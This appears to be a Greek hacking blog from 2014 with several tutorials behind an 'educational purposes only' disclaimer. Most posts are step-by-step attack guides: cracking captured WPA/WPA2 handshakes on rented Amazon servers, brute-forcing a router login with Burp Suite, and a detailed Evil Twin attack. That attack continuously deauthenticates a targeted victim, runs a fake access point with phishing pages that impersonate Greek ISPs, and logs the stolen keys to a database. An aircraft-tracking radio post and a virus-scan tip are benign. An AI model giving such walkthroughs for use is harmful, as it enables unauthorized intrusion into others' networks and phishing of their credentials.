ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Κυριακή, 30 Μαρτίου 2014

Πως σπαμε ασυρματα δικτυα με την ταχυτητα του Amazon



Τι θα χρειαστειτε;

1.Kali linux
2.Λογαριασμο στο Amazon
3.Prepaid card (Mastercard η Visa)


O συγκεκριμενος οδηγος θα σας δειξει πως μπορειτε να χρησιμοποιησετε την επεξεργαστικη ταχυτητα που σας δινει το Αmazon για να σπασατε ποιο γρηγορα τα ασυρματα δικτυα



Για να φτιαξετε ενα λογαριασμο στο Amazon πατηστε εδω


επιλεγουμε continue


 Αν θελετε να ειναι δωρεαν εως 12 μηνες με 750 ωρες δωρεαν καθε μηνα αλλα χωρις μεγαλη επεξεργαστικη ταχυτητα τοτε επιλεξτε στην καρτελα EC2 instance Type Standard Micro
Αν θελετε μεγαλυτερη ταχυτητα τοτε κοιταξτε τον τιμοκαταλογο στα δεξια και αναλογα αποφασιζετε
Προσοχη Αν δεν ξερεις τι κανεις τοτε καλυτερα επελεξε standard Micro (t1.micro) και μετα αποφασιζεις
Επισης να γνωριζετε οτι μετα απο 12 μηνες θα αρχισει να σας χρεωνει οποτε μην ξεχασετε το συμβαν (instance) να τρεχει σταματιστε το.

τωρα αφου εχουμε επιλεξει τι θελουμε  πηγαινουμε λιγο κατω

Επιλεγουμε  My IP
στο Key Pair παταμε και μας ανοιγει καρτελα
επιλεγουμε create key pair

γραφουμε ενα ονομα κλειδιου κατι ωστε να το θυμαστε και επιλεγουμε yes

επιλεγουμε save file και ok
θα κατεβει το κλειδι μας σε αρχειο .pem


τωρα πηγαινουμε και κανουμε μια ανανεωση της προηγουμενης σελιδας και βλεπουμε οτι εχει εισαχθει το κλειδι

τωρα πηγαινουμε λιγο πανω στη σελιδα  και επιλεγουμε continue
*τωρα σε αυτο το σημειο θα σας ζητησει να βαλετε την καρτα μαζι με τα στοιχεια κατοχου και να εξακριβωσετε τον αριθμο του κινητου σας , ειναι μια πολυ ευκολη διαδικασια απλα ακολουθηστε τα βηματα

οταν τελειωσετε θα σας εμφανισει αυτο


επιλεγουμε AWS Management Console
και οπως βλεπουμε ειμαστε ετοιμη να ενωθουμε


θα χρειαστουμε 2 πραγματα για να ενωθουμε την public ip την οποια την λεει και το κλειδι

την public ip την βλεπετε εδω


τωρα εφοσον ειναι ολα μια χαρα ας ενωθουμε με
ανοιγουμε ενα τερματικο στα kali linux και γραφουμε

chmod 400 /root/Downloads/nickthesail0r.pem

οπου /root/Downloads/nickthesail0r.pem ειναι η διαδρομη που βρισκεται το κλειδι .pem

και με την εντολη

ssh -i /root/Downloads/nickthesail0r.pem kali@54.84.121.189

συνδεομαστε οπου
-i το κλειδι.pem
kali@η public ip μας

θα μας ζητησει αν θελουμε να συνδεθουμε και γραφουμε yes και enter

οποτε συνδεομαστε

 *εσεις θα εχετε αλλη διαδρομη και ονομα αρχειου.pm και επισης αλλη public ip

οποτε τωρα ειμαστε ετοιμoι

γραφουμε στο τερματικο που ειμαστε συνδεδεμενοι με το amazon

sudo -i
για να παρουμε δικαιωματα root
μετα
apt-get update
και
apt-get install john
περιμενουμε μεχρι να γινει η εγκατασταση
μετα γραφουμε
apt-get install aircrack-ng

*για το πως καταγραφουμε το 4 ways handshake δειτε σε παλιοτερους οδηγους μου


τωρα ειμαστε ετοιμη να σπασουμε το αρχειο .cap

για να ανεβασουμε το αρχειο απλα γραφουμε σε ενα τερματικο

scp -i /root/Downloads/nickthesail0r.pem /root/handshakes/handshake.cap kali@54.84.121.189:handshake.cap

δλδ scp -i {διαδρομη που ειναι το κλειδι} {διαδρομη που ειναι το handshake} kali@{public ip}:{διαδρομη και ονομα handshake δλδ σε ποιο φακελο θελουμε να το παμε}

οταν το ανεβασει θα δουμε αυτο


τωρα γραφουμε
ls
και βλεπουμε το αρχειο handshake.cap


τωρα γραφουμε παλι
sudo -i
και τρεχουμε την εντολη

john --stdout --incremental:all | aircrack-ng -b 00:13:31:9C:4B:49 -w- /home/kali/handshake.cap

-b ειναι η mac address του δικτυου που καταγραψαμε το handshake
-w- η διαδρομη για το handshake
και οι υπολοιπες εντολες του john the ripper ειναι για να παραγουν κωδικους
για να καταλαβετε καλυτερα απλα γραψτε σε ενα τερματικο man john 

και τωρα θα σας αρχισει να σπαει τo κλειδι
*βλεπετε οτι η ταχυτητα ειναι ελαχιστη


τωρα θα κανω την ιδια εγκατασταση απο την αρχη αλλα θα διαλεξω την μεγιστη ταχυτητα
την οποια θα με χρεωνει περιπου 1.58 δολαρια την ωρα



οπως βλεπετε  εχει σπασει το κλειδι με ταχυτητα 5862 k/s και χρονο 11 δευτερολεπτα

*πρεπει να ξερετε οτι το john μεχρι 8 χαρακτηρες μπορει να παραγει κωδικους αν θελετε αλλαζετε το john.conf και βαζετε οσους χαρακτηρες θελετε
απλα να ξερετε οτι ο κωδικος σε ενα ασυρματο δικτυο wpa/wpa2 ειναι απο 8 χαρακτηρες και πανω
οι περισσοτεροι απλα βαζουνε μονο 8 χαρακτηρες συνηθως
ετσι μπορειτε να μειωσετε τον χρονο σπασιματος
οποτε αλλαξτε και το MinLen = 0 σε MaxLen =8 και στο MaxLen βαζετε οτι θελετε



*μπορειτε να ανεβασετε και τα λεξικα σας με τον ιδιο τροπο που ανεβασαμε τo handshake και να τρεξετε την εντολη aircrack-ng /home/kali/handshake.cap -w /home/kali/lexiko.txt ετσι ωστε να σπασετε το ασυρματο δικτυο με dictionary attack


  


Παρασκευή, 28 Μαρτίου 2014

Πως κοιταμε αν ενα αρχειο ειναι μολυσμενο με ιο



Τι θα χρειαστειτε;

1.Εναν οποιδηποτε περιηγητη
2.Συνδεση στο internet

Μερικα Antivirus που εχουμε δεν μπορουν να εντοπισουν ορισμενους ιους γιατι ειναι ενσωματωμενοι σε εκτελεσιμα αρχεια και κρυπτογραφημενοι

για να ελενξουμε αν ενα αρχειο ειναι καθαρο παταμε εδω


επιλεγουμε choose file ,ανεβαζουμε το αρχειο μας και επιλεγουμε scan it
πχ δειτε προσεχτικα την εικονα κατω


οπως βλεπετε στην εικονα ανεβασα το Greek wpa finder
το οποιο ειναι ενα προγραμμα που ειναι παντου στο διαδικτυο και σας βοηθαει να ''σπατε'' ασυρματα δικτυα .Στην ουσια αυτο το προγραμμα απλα βρισκει εργοστασιακους κωδικους απο καποια ασυρματα δικτυα και δεν τα σπαει
Βλεπουμε οτι εντοπιστηκε απο 4 antivirus και τα αλλα 47 δεν εντοπισαν τιποτα
Εχει ψηφιστει απο 4 ατομα οτι ειναι κακοβουλο και απο 11 οτι δεν ειναι,αυτο ειναι υποπτο γιαι αυτα τα 11 ατομα προφανως θελουν να μπερδεψουν τον χρηστη ετσι ωστε να εχει το αρχειο στον υπολογιστη του.
ποιο κατω βλεπετε τι ιους βρηκε και ποιο antivirus εντοπισε τον ιο.
δλδ αν κανετε εγκατασταση το Avira θα εντοπισει και θα σβησει τον ιο (στο συγκεκριμενο προγραμμα ο ιος ειναι ενσωματωμενος οποτε θα σας σβησει το εκτελεσιμο αρχειο)

Απλα να ξερετε οτι τιποτα δεν ειναι δωρεαν στο διαδικτυο  και οτι καποια φακα θα υπαρχει
Επισης να ξερετε ποτε μα ποτε η λεξη "σπαω" και "hacking" δεν παει με τα windows οτι θελετε να κανετε μονο απο kali linux :)

Δευτέρα, 24 Μαρτίου 2014

Πως θα εντοπιζετε ποια αεροπλανα περνανε απο την περιοχη σας




Τι θα χρειαστειτε;

1.Kali linux 1.0.6
2.Ενα στικακι DVB-T  RTL2832U
για  αγορασετε ενα στικακι RTL-SDR πατηστε  εδω
3.dump1090 κατεβαστε εδω


Οταν κατεβασουμε το dump1090 το αποσυμπιεζουμε (ας υποθεσουμε οτι βρισκετε στο φακελο downloads) τοτε γραφουμε στο τερματικο μας

mv /root/Downloads/dump1090-master.zip -f /root/Desktop/

και το μεταφερουμε στην επιφανεια εργασιας μας
τωρα για να το αποσυμπιεσουμε γραφουμε

unzip '/root/Desktop/dump1090-master.zip' -d /root/Desktop/dump1090/

*αν δεν εχετε το unzip τοτε γραφετε apt-get install unzip για να το κανετε εγκατασταση

και θα δουμε στην επιφανεια εργασιας μας  τον φακελο dump1090

οποτε τωρα γραφουμε
cd Desktop/dump1090/dump1090-master/

μετα γραφουμε

make

αν ολα πανε καλα τοτε θα μας εμφανισει αυτο


μετα ειμαστε ετοιμοι να δουμε τα αεροπλανα

συνδεουμε το στικακι μας και γραφουμε την εντολη

./dump1090 --net --interactive

οταν πιασει καποιο αεροπλανο θα μας βγαλει τα στοιχεια



τωρα για να δουμε που ειναι στον χαρτη κτλ γραφουμε στον περιηγητη μας

http://127.0.0.1:8080

και βλεπουμε τα αεροπλανα στο χαρτη


και εδω κανουμε μια μεγεθυνση


το dump1090 συντονιζει το στικακι μας στην συχνοτητα 1090Mhz  η οποια αυτη η συχνοτητα εκπεμπετε απο το συστημα ADS-B (Automatic dependent surveillance-broadcast) των αεροπλανων με συνεπεια να μπορουμε να βλεπουμε στιγμα ,ταχυτητα,υψος,αναγνωριστικο ICAO και πτηση
*δεν χρειαζεστε κεραια εγω αυτα τα επιασα με την απλη κεραιουλα που ειχε μαζι με το στικακι

Ενα αλλο προγραμμα που μπορειτε να χρησιμοποιησετε ειναι το acarsd
κατεβαζετε εδω

οταν κατεβει ακολουθουμε τα ιδια βηματα οπως και το dump1090

πριν τρεξουμε το acarsd πηγαινουμε Eφαρμογες-Kali Linux-Wireless attacks-Software defined radio και ανοιγουμε το gqrx

ακουμε στην συχνοτητα 151,550Mhz
σε αυτη την συχνοτητα εκμπεμπουν τα αεροπλανα με το συστημα ACARS
(Aircraft Communications Addressing and Reporting System) το οποια ειναι ενα συστημα που ανταλλασουν μικρα μηνυματα με τον πυργο ελεγχου.

εμεις πηγαινουμε σε αυτη την συχνοτητα περιπου και προσπαθουμε να δουμε μικρες κοφτες γραμμες 


 οταν ακουσουμε αυτο τον ηχο
*πρεπει να ειμαστε στα ΑΜ


τοτε παταμε record ,το αφηνουνε για οσο θελουμε και μετα το σταματαμε


τωρα τρεχουμε το acarsd με την εντολη

./acarsdec -f /root/gqrx-20140323-183115.wav

οπου -f κτλ ειναι η διαδρομη του αρχειου wave(ηχου) που καταγραψαμε με το gqrx

θα μας εμφανισει τις εξεις πληροφοριες οπως τυπο αεροπλανου,πτηση και αεροπορικη εταιρεια


  τωρα για να ακουσουμε τα αεροπλανα πολυ απλα με το gqrx


βλεπουμε την κυματομορφη συντονιζουμε τον δεκτη μας  περιπου 129,000-139,000Mhz στα ΑΜ και ακουμε τον πυργο ελεγχου και τα αεροπλανα

*Για περισσοτερους οδηγους και τι αλλο μπορει να κανετε με αυτο το στικακι κοιταξτε  εδω



Κυριακή, 23 Μαρτίου 2014

Πως σπαμε τον κωδικο του router (με Burpsuite)






Tι θα χρεαστειτε;

1.Kali Linux


Ανοιγουμε το burpsuite (Θα το βρειτε Εφαρμογες-Kali linux-Top 10 security Tools-burpsuite)
Για να ρυθμισουμε Burp Suite πρεπει να ανοιξουμε τον περιηγητη μας (browser)
και να ρυθμισουμε το proxy ετσι ωστε να περναει το request μας πρωτα απο το Burp Suite και μετα στον περιηγητη δειτε εικονα κατω τα βηματα των ρυθμισεων


τωρα ανοιγουμε το burpsuit πηγαινουμε στην σελιδα login του router και βαζουμε τα κριτηρια συνδεσης δειτε εικονα κατω
 

οταν πατησετε login θα δειτε οτι το αιτημα σας δεν προωθειτε και η καρτελα proxy - intercept του burp suit εχει γινει πορτοκαλι δειτε εικονα κατω


οπως βλεπετε με το που πατησαμε login το burb suite επιασε το αιτημα που στειλαμε μαζι με τα κριτηρια συνδεσης που γραψαμε ,τωρα πρεπει να πατησουμε forward για να προωθηθει το αιτημα μας
και οπως βλεπετε στον περιηγητη μας δεν ητανε σωστα τα κριτηρια συνδεσης μας 



Τωρα πηγαινουμε στο burp suite και επιλεγουμε το αιτημα που στειλαμε τα λαθος κριτηρια συνδεσης παταμε δεξι κλικ και επιλεγουμε sent to intruder ,δειτε εικονα κατω


οποτε τωρα πηγαινουμε στην καρτελα του intruder – positions για να ρυθμισουμε την επιθεση μας



oπως βλεπετε στην πανω εικονα αυτοματα το burpsuite εχει βαλει τις παραμετρους που μπορουμε να επιτεθουμε


 


τωρα επιλεγουμε στο attack type Cluster bomb και πηγαινουμε στη καρτελα payloads ,επιλεγουμε στο payload set 1 ,payload type επιλεγουμε Simple list ,πηγαινουμε στο ποιο κατω στο payload options και στο load μπορουμε να προσθεσουμε το λεξικο μας η στο add να γραψουμε ενα ονομα χρηστη πχ admin και να πατησουμε enter προσθετωντας το,το ιδιο κανουμε και για το payload 2 που θα ειναι για τον κωδικο δλδ με λιγα λογια εχουμε βαλει στην πρωτη παραμετρο 1 username=§xrhsths§ να δοκιμαζει ονοματα χρηστη και στην παραμετρο 2 psd=§kodikos§ να δοκιμαζει κωδικους δειτε εικονα κατω 

 
 
μπορειτε να επιλεξετε επισης για Payload type :Dates ετσι ωστε να δοκιμασει ημερομηνιες για κωδικο δειτε εικονα κατω


τωρα πανω πανω στο κεντρικο menu επιλεγουμε intruder και start attack δειτε εικονα κατω
 

στην εικονα πανω το status σε ολα τα κριτηρια ειναι το ιδιο μονο στο
request 66 βλεπουμε διαφορετικο μεγεθος lenght 296

 


 οποτε ειναι το ονομα χρηστη admin και κωδικος sail0r

Τετάρτη, 12 Μαρτίου 2014

Πως σπαμε ενα ασυρματο δικτυο WPA/WPA2 (χωρις λεξικο) με την μεθοδο Evil Twin



Τι θα χρειαστειτε;

1.Kali Linux
2.Evil Twin
3.Συνδεση στο internet και μια ασυρματη καρτα

Η μεθοδος Evil Twin ειναι μια μεθοδος ψαρεματος για κωδικο wpa/wpa2
δλδ στην ουσια φτιαχνουμε ενα ιδιο δικτυο με το στοχευμενο ασυρματο δικτυο που θελουμε να σπασουμε ,μετα στελνουμε deauth πακετα στο χρηστη με συνεπεια να μην μπορει να συνδεθει με το δικτυο του,ο χρηστης στην προσπαθεια του να καταλαβει τι εχει γινει, συνδεετε με το δικο μας ψευτικο ασυρματο δικτυο ,αυτοματως ανακατευθυνετε στην σελιδα μας και εκει βαζει τον κωδικο του.


Κατεβαζουμε το  Evil twin εδω
η εδω

οταν κατεβει τoτε γραφουμε σε ενα τερματικο

mv /root/Downloads/eviltwin.tar -f /root/Desktop/ ετσι ωστε να το μεταφερουμε απο το φακελο Downloads στην επιφανεια εργασιας

μετα γραφουμε

tar -xvf /root/Desktop/eviltwin.tar -C /root/Desktop/ ετσι ωστε να τα κανει extract (αποσυμπιεση)

θα δουμε οτι στην επιφανεια εργασιας μας εχει ενα φακελο root τοτε γραφουμε

mv /root/Desktop/root/Eviltwin/cyta -f /var/www/
mv /root/Desktop/root/Eviltwin/forthnet -f /var/www/
mv /root/Desktop/root/Eviltwin/hol -f /var/www/
mv /root/Desktop/root/Eviltwin/wind -f /var/www/
mv /root/Desktop/root/Eviltwin/ote -f /var/www/

και εχουνε παει τα αρχεια μας στο φακελο /var/www/

μετα γραφουμε

nano /etc/dnsmasq.conf
και βγαζουμε το #  απο interface=at0


και παλι ποιο κατω βγαζουμε το #dhcp-range ....κτλ


παταμε ctr+x επιλεγουμε y και enter για να αποθηκευσει
*αν σας εμφανισε κενο τοτε γραφετε την εντολη 
mv /root/Desktop/root/Eviltwin/dnsmasq.conf -f /etc/
η δημιουργειτε ενα αρχειο κειμενου dnsmasq.conf και γραφετε τις ποιο πανω γραμμες που αφερεσαμε το # δλδ interface=at0 και dhcp-range=192.168.0.50,192,168.0.150,255.255.255.0,12h
το αποθηκευετε.

1.Αν εχουμε 2 ασυρματες καρτες συνδεουμε την μια στο διαδικτυο
και με την αλλη θα φτιαξουμε το ψευτικο δικτυο
2.Αν εχουμε μια ασυρματη καρτα τοτε συνδεομαστε με το ethernet (ενσυρματα με το διαδικτυο και με την ασυρματη καρτα θα φτιαξουμε το ψευτικο δικτυο
3.Αν εχουμε adnroid τηλεφωνο τοτε μεσω tehering συνδεομαστε με το διαδικτυο και θα φτιαξουμε με την ασυρματη καρτα μας το ψευτικο δικτυο

τωρα στις 2 πρωτες περιπτωσεις δεν θα χρειαστειτε καποια προετοιμασια

στην δευτερη με το κινητο θα χρειαστειτε οποτε συνδεουμε με το καλωδιο του κινητου μας κινητο και υπολογιστη και θα μας εμφανισει στο κινητο μας να μοιραστουμε την συνδεση κινητης  με τον υπολογιστη (tethering)



μετα πηγαινουμε πανω δεξια στην δικτυωση και επιλεγουμε με δεξι κλικ επεξεργασια συνδεσεων
επιλεγουμε κινητη ευρυζωνικη και προσθηκη


επιλεγουμε το κινητο που συνδεσαμε και συνεχεια
*μπορειτε να βαλετε και ενα στικακι κινητης ευροζωνικης αντι για κινητο


επιλεγουμε την χωρα


επιλεγουμε τον παροχο μας



 και Mobile Broadband on Demand


επιλεγουμε εφαρμογη και εμαστε ετοιμοι


τοτε ανοιγουμε ενα τερματικο και γραφουμε 
ifconfig usb0 up
και μετα παλι 
ifconfig και βλεπουμε το interface usb0
δλδ usb0 θα χρησιμοποιησουμε  οταν θα μας ρωτισει με ποιο interface ειμαστε ενωμενοι με το διαδικτυο
να ξερετε οτι μπορει να σας χρεωσει δεδομενα γιατι στην ουσια μοιραζετε την συνδεση της κινητης σας 
*αν δεν εχετε καρτα δλδ δεδομενα απο την κινητη σας δεν πειραζει παλι λειτουργει  αλλα δεν θα μπορει το θυμα να ενωθει με το διαδικτυο αλλα την δουλεια σας θα την κανετε
 

Πριν τρεξουμε το script πρεπει να κανουμε μια μικρη ερευνα σχετικα με το ασυρματο δικτυο που θελουμε να σπασουμε

οποτε βαζουμε την καρτα μας σε monitor mode
γραφουμε
airmon-ng start wlan0
και μετα ανιχνευουμε με το airodump-ng
γραφουμε
airodump-ng mon0 βλεπουμε τον στοχο και παταμε ctrl+c για να σταματησει


μετα τρεχουμε παλι το airodump-ng για το συγκεκριμενο δικτυο
δλδ
airodump-ng mon0 --bssid  00:1F:9F:8E:53:9B -c 6
παταμε παλι ctrl+c και σημειωνουμε την συσκευη που ειναι συνδεδεμενη με το ασυρματο δικτυο
δλδ 


πχ το στοχευμενο δικτυο μας ειναι το Cyta5B34B με mac address 00:1F:9F:8E:53:9B και καναλι 6 και το θυμα μας C4:43:8F:D5:53:17

στην συγκεκριμενη περιπτωση απο το ονομα μπορουμε να καταλαβουμε οτι εχει παροχο cyta αν πχ ειχε αλλο ονομα τοτε θα εψαχνα να βρω απο ποια συσκευη ειναι η mac address και να εβρισκα ποιος παροχος δινει τετοια ρουτερ
πχ πατηστε εδω και βαλτε την mac address και θα δειτε οτι η mac address ειναι της Thompson οποτε με λιγο ψαξιμο θα βρειτε ποια εκαστοτε εταιρεια εδινε αυτα τα ρουτερ στους συνδρομητες  της



τωρα για να τρεξουμε το script  γραφουμε

bash /root/Desktop/root/Eviltwin/eviltwin.sh


επιλεγουμε 1 για cyta

μετα επιλεγουμε ποια ασυρματη καρτα θελουμε να βαλουμε σε monitor mode
πχ εγω εχω 2 ασυρματες καρτες οπως βλεπετε κατω οποτε διαλεγω την wlan2
αν ειχα μια θα διαλεγα wlan0 και θα μοιραζα το internet μου απο eth0 η usb0


μετα γραφουμε το monitor interface πχ mon0


 τωρα γραφουμε το ονομα του στοχευμενου δικτυου πχ Cyta5B34B


τωρα θα μας ζητησει να βαλουμε το καναλι πχ το στοχευμενο δικτυο ειναι στο καναλι 6 οποτε εμεις θα βαλουμε η 3 καναλια πανω η τρια καναλια κατω
αποσταση
δλδ 1,2, η 10,11
το κανουμε αυτο ετσι ωστε να μην εχει καποια εμπλοκη με το mdk3, το airdrop η το aircrack-ng
*αν δεν μπορειτε να αποσυνδεσετε τον χρηστη απο το δικτυο του τοτε βαλτε το ιδιο καναλι 
εγω  βαζω το καναλι 1


 τωρα βαζουμε την mac address του ψευτικου δικτυου
00:1F:9F:8E:53:9B ειναι η κανονικη οποτε εγω βαζω κατι πλησιεστερο και οχι το ιδιο πχ 00:1F:9F:8E:53:9C


τωρα θα μας φτιαξει το ψευτικο δικτυο και θα μας ζητησει να γραψουμε απο ποιο interface ειμαστε ενωμενοι με το διαδικτυο
εγω βαζω wlan0 εσεις μπορειτε να βαλετε eth0 αν ειστε ενωμενοι με καλωδιο η usb0 με κινητη ευρυζωνικη


τωρα θα μας ζητησει να γραψουμε την ip μας.
την ip μας την βρισκουμε αν παμε πανω δεξια στην δικτυωση και πατησουμε πληροφοριες συνδεσης
πχ 192.168.1.2 



τωρα θα σας ανοιξει το browser σας και θα σας εμφανισει την ψευτικη σελιδα

στο τερματικο σας θα σας βγαλει αυτο


παταμε enter 
και γραφουμε τις εξεις εντολες
create database wpa2; 
use wpa2
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
select * from content;
θα μας εμφανισει 


*αυτες τις εντολες τις τρεχουμε μονο οταν τρεξουμε το script για πρωτη φορα
οταν το τρεξουμε την δευτερη φορα απλα γραφουμε
use wpa2
για να εμφανισει τους κωδικους
select * from content
και για να διαγραψει τους κωδικους
TRUNCATE TABLE content;

τωρα ειμαστε ετοιμοι να επιτεθουμε στο στοχο
*αν θελουμε γραφουμε airmon-ng start mon0 για να τρεξουμε την εντολη aireplay με mon1

ανοιγουμε ενα τερματικο και γραφουμε
aireplay-ng -0 0 -a 00:1F:9F:8E:53:9B -c C4:43:8F:D5:53:17 mon0


οπου -0 0 θα αποσυνδεει συνεχεια
-a η mac address του στοχευμενου δικτυου
-c η mac address της συσκευης που ειναι συνδεδεμενη στο στοχευμενο δικτυο
mon0 το interface

δλδ με αυτη την εντολη  θα αποσυνδεει συνεχεια τον χρηστη απο το δικτυο του

ο χρηστης δεν θα μπορει πλεον να περιηγηθη στο διαδικτυο θα ψαχνει να βρει τι φταιει και οταν παει να  δει τα ασυρματα δικτυα του θα ενωθει με το δικο μας
*οταν δουμε got direct probe request και το το ονομα του  δικτυου τοτε παει να πει οτι τον εχουμε αποσυνδεση απο το δικτυο του και ειναι θεμα χρονου μεχρι να ενωθει με το ψευτικο δικτυο μας  
οταν ενωθει θα το δουμε απο εδω πχ


* υπαρχει περιπτωση ο χρηστης να κανει reboot στο ρουτερ του αυτο θα το καταλαβετε οταν πλεον δεν μπορειτε να στειλετε deauth πακετα για να το εξακριβωσετε τρεξτε την εντολη
airodump-ng mon0 --bssid mac-address-stoxou -c kanali stoxou --uptime τοτε θα δειτε ποση ωρα ειναι το ρουτερ σε λειτουργια
 μετα αν θελουμε σταματαμε την εντολη aireplay-ng με ctrl+c

και οταν ο χρηστης προσπαθησει να περιηγηθει σε μια ιστοσελιδα θα ανακατευθυνθει σε αυτη την σελιδα 


θα βαλει τον κωδικο του, θα του εμφανιστει αυτη η σελιδα 


οταν πατησει συνεχεια τοτε θα ανακατευθυνθει στο www.google.gr
χωρις να καταλαβει τιποτα :)

εμεις τοτε πηγαινουμε στο τερματικο μας και γραφουμε
select * from content; ωστε να μας εμφανισει τον κωδικο


και ετσι με την μεθοδο Evil Twin σπαμε (ψαρευουμε) ασυρματα δικτυα wpa/wpa2

Αυτη η μεθοδος για να εχει αποτελεσμα 100% πρεπει να υπαρχει ενωμενος χρηστης και να ειναι παρον. αυτο θα το καταλαβετε απο τα δεδομενα που ανεβενουν πολυ γρηγορα

Πως θα προστατευτειτε;

Καντε το ασυρματο σας δικτυο κρυφο αυτο θα αποτρεψει προσωρινα βεβαια αν αυτος που κανει την επιθεση εχει βαλει στοχο το δικτυο σας
Απλα αν δειτε το δικτυο  σας 2 φορες και ελευθερο τοτε μην συνδεθειτε